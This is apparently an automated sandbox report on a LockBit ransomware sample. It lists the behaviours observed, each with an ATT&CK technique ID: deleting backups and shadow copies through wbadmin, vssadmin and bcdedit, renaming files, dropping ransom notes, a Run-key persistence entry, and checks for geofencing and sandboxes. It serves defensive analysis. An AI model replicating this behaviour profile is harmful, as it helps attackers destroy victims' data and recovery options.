lockbit | 1d79d85948aa4c62b8367f233b088d9adb00915475a559f7e163e12edf9b9ccb

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	Process
1008	bcdedit.exe
5036	bcdedit.exe
5096	bcdedit.exe
2252	bcdedit.exe
7548	bcdedit.exe
9936	bcdedit.exe
5956	bcdedit.exe
7732	bcdedit.exe
7940	bcdedit.exe
6916	bcdedit.exe
5356	bcdedit.exe
7784	bcdedit.exe

Renames multiple (6438) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 10 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

pid	Process
6664	wbadmin.exe
6868	wbadmin.exe
10152	wbadmin.exe
7740	wbadmin.exe
5684	wbadmin.exe
6452	wbadmin.exe
8004	wbadmin.exe
8796	wbadmin.exe
9144	wbadmin.exe
5476	wbadmin.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

Processes:

wbadmin.exe

pid	Process
2448	wbadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\""	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

description	ioc	Process
File opened (read-only)	\??\F:	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Drops file in Program Files directory 64 IoCs

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-white.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\eu-es\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.scale-200_contrast-black.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pl-pl\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-36_altform-lightunplated.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\ui-strings.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\progress.gif	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\82.jpg	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-36.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\Scrubbing_icons.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square71x71\PaintSmallTile.scale-200.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\WideTile.scale-125.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fi.pak.DATA	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\BOLDSTRI.INF	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\gl.pak.DATA	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\StopwatchLargeTile.contrast-white_scale-125.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\s_thumbnailview_18.svg	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.altform-unplated_targetsize-24.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_empty_state.svg	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\ui-strings.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Windows Media Player\de-DE\setup_wm.exe.mui	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-32.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\images\illustration-UploadToOD.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-125.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-80_altform-unplated.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\fonts\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\animations\OneNoteFirstRunCarousel_Animation2.mp4	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxBlockMap.xml	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\ui-strings.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity-dark.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-96.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-150_contrast-black.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\index.html	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-400.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-100_contrast-white.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Info.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalSplashScreen.scale-200_contrast-white.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSplashScreen.scale-100_contrast-black.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\Assets\Square150x150Logo.scale-100.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\LICENSE	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\messaging\bookmark_empty_state.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\WideTile.scale-100.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-80_altform-unplated.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\Restore-My-Files.txt	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\LICENSE	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ORGCHART.CHM	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.targetsize-32_altform-unplated.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-30_altform-unplated.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-100_contrast-white.png	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\am.pak.DATA	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-pl.xrm-ms	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Drops file in Windows directory 30 IoCs

Processes:

wbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exewbadmin.exe

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

vds.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 6 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

Inhibit System Recovery

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	Process
3484	vssadmin.exe
4272	vssadmin.exe
6664	vssadmin.exe
5460	vssadmin.exe
9416	vssadmin.exe
6000	vssadmin.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
7144	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

pid	Process
1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe
1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exeWMIC.exewbengine.exewmic.exe

description	pid	Process
Token: SeBackupPrivilege	3204	vssvc.exe
Token: SeRestorePrivilege	3204	vssvc.exe
Token: SeAuditPrivilege	3204	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3236	WMIC.exe
Token: SeSecurityPrivilege	3236	WMIC.exe
Token: SeTakeOwnershipPrivilege	3236	WMIC.exe
Token: SeLoadDriverPrivilege	3236	WMIC.exe
Token: SeSystemProfilePrivilege	3236	WMIC.exe
Token: SeSystemtimePrivilege	3236	WMIC.exe
Token: SeProfSingleProcessPrivilege	3236	WMIC.exe
Token: SeIncBasePriorityPrivilege	3236	WMIC.exe
Token: SeCreatePagefilePrivilege	3236	WMIC.exe
Token: SeBackupPrivilege	3236	WMIC.exe
Token: SeRestorePrivilege	3236	WMIC.exe
Token: SeShutdownPrivilege	3236	WMIC.exe
Token: SeDebugPrivilege	3236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3236	WMIC.exe
Token: SeRemoteShutdownPrivilege	3236	WMIC.exe
Token: SeUndockPrivilege	3236	WMIC.exe
Token: SeManageVolumePrivilege	3236	WMIC.exe
Token: 33	3236	WMIC.exe
Token: 34	3236	WMIC.exe
Token: 35	3236	WMIC.exe
Token: 36	3236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3236	WMIC.exe
Token: SeSecurityPrivilege	3236	WMIC.exe
Token: SeTakeOwnershipPrivilege	3236	WMIC.exe
Token: SeLoadDriverPrivilege	3236	WMIC.exe
Token: SeSystemProfilePrivilege	3236	WMIC.exe
Token: SeSystemtimePrivilege	3236	WMIC.exe
Token: SeProfSingleProcessPrivilege	3236	WMIC.exe
Token: SeIncBasePriorityPrivilege	3236	WMIC.exe
Token: SeCreatePagefilePrivilege	3236	WMIC.exe
Token: SeBackupPrivilege	3236	WMIC.exe
Token: SeRestorePrivilege	3236	WMIC.exe
Token: SeShutdownPrivilege	3236	WMIC.exe
Token: SeDebugPrivilege	3236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3236	WMIC.exe
Token: SeRemoteShutdownPrivilege	3236	WMIC.exe
Token: SeUndockPrivilege	3236	WMIC.exe
Token: SeManageVolumePrivilege	3236	WMIC.exe
Token: 33	3236	WMIC.exe
Token: 34	3236	WMIC.exe
Token: 35	3236	WMIC.exe
Token: 36	3236	WMIC.exe
Token: SeBackupPrivilege	3264	wbengine.exe
Token: SeRestorePrivilege	3264	wbengine.exe
Token: SeSecurityPrivilege	3264	wbengine.exe
Token: SeIncreaseQuotaPrivilege	8440	wmic.exe
Token: SeSecurityPrivilege	8440	wmic.exe
Token: SeTakeOwnershipPrivilege	8440	wmic.exe
Token: SeLoadDriverPrivilege	8440	wmic.exe
Token: SeSystemProfilePrivilege	8440	wmic.exe
Token: SeSystemtimePrivilege	8440	wmic.exe
Token: SeProfSingleProcessPrivilege	8440	wmic.exe
Token: SeIncBasePriorityPrivilege	8440	wmic.exe
Token: SeCreatePagefilePrivilege	8440	wmic.exe
Token: SeBackupPrivilege	8440	wmic.exe
Token: SeRestorePrivilege	8440	wmic.exe
Token: SeShutdownPrivilege	8440	wmic.exe
Token: SeDebugPrivilege	8440	wmic.exe
Token: SeSystemEnvironmentPrivilege	8440	wmic.exe
Token: SeRemoteShutdownPrivilege	8440	wmic.exe
Token: SeUndockPrivilege	8440	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.execmd.exe

description	pid	Process	procid_target
PID 1948 wrote to memory of 4972	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	82
PID 1948 wrote to memory of 4972	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	82
PID 4972 wrote to memory of 3484	4972	cmd.exe	84
PID 4972 wrote to memory of 3484	4972	cmd.exe	84
PID 4972 wrote to memory of 3236	4972	cmd.exe	88
PID 4972 wrote to memory of 3236	4972	cmd.exe	88
PID 4972 wrote to memory of 1008	4972	cmd.exe	91
PID 4972 wrote to memory of 1008	4972	cmd.exe	91
PID 4972 wrote to memory of 5036	4972	cmd.exe	92
PID 4972 wrote to memory of 5036	4972	cmd.exe	92
PID 4972 wrote to memory of 2448	4972	cmd.exe	93
PID 4972 wrote to memory of 2448	4972	cmd.exe	93
PID 1948 wrote to memory of 4272	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	97
PID 1948 wrote to memory of 4272	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	97
PID 1948 wrote to memory of 5096	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	100
PID 1948 wrote to memory of 5096	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	100
PID 1948 wrote to memory of 2252	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	103
PID 1948 wrote to memory of 2252	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	103
PID 1948 wrote to memory of 6664	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	111
PID 1948 wrote to memory of 6664	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	111
PID 1948 wrote to memory of 6868	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	107
PID 1948 wrote to memory of 6868	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	107
PID 1948 wrote to memory of 8440	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	150
PID 1948 wrote to memory of 8440	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	150
PID 1948 wrote to memory of 6664	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	111
PID 1948 wrote to memory of 6664	1948	2024-06-12_adee08d1d86e361d08ced8adc8ab17dc_blackenergy_lockbit.exe	111
